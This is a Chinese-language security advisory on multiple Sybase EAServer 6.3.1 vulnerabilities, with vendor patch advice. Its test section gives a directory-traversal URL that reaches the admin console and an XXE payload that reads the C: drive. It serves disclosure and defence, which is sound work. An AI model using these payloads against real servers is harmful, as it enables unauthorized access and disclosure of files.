安全研究
安全漏洞
Sybase EAServer多个安全漏洞
发布日期:2013-07-19
更新日期:2013-07-22
受影响系统:Sybase EAServer <=6.3.1
描述:
BUGTRAQ ID:
61358
Sybase EAServer是高性能、可伸缩、安全、开放的应用服务器,适用于适用多层架构的电子门户和互联商务解决方案。
Sybase EAServer 6.3.1及更早版本存在目录遍历、XML外部实体注入、命令执行等多个安全漏洞,成功利用后可允许攻击者在受影响计算机上下载和上传任意文件,获取敏感信息并以当前用户权限执行任意命令。
<*来源:Gerhard Wagner
Bernhard Mueller
链接:
http://seclists.org/bugtraq/2013/Jul/133
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
1) 目录遍历
下列请求允许访问Sybase EAServer管理应用:
https://example.com/myapp/%5C../console/Login.jsp
也可访问Sybase EAServer自带的其他应用:
/rest
/wsh
/wsf
...
2) XML实体注入
下列XML消息显示了Windows上C:的内容:
system:
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///C:\">]>
<lol>
<dt>
<stringValue>&xxe;</stringValue>
<booleanValue>0</booleanValue>
</dt>
</lol>
3) OS命令执行
建议:
厂商补丁:
Sybase
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.sybase.com/support浏览次数:3955
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |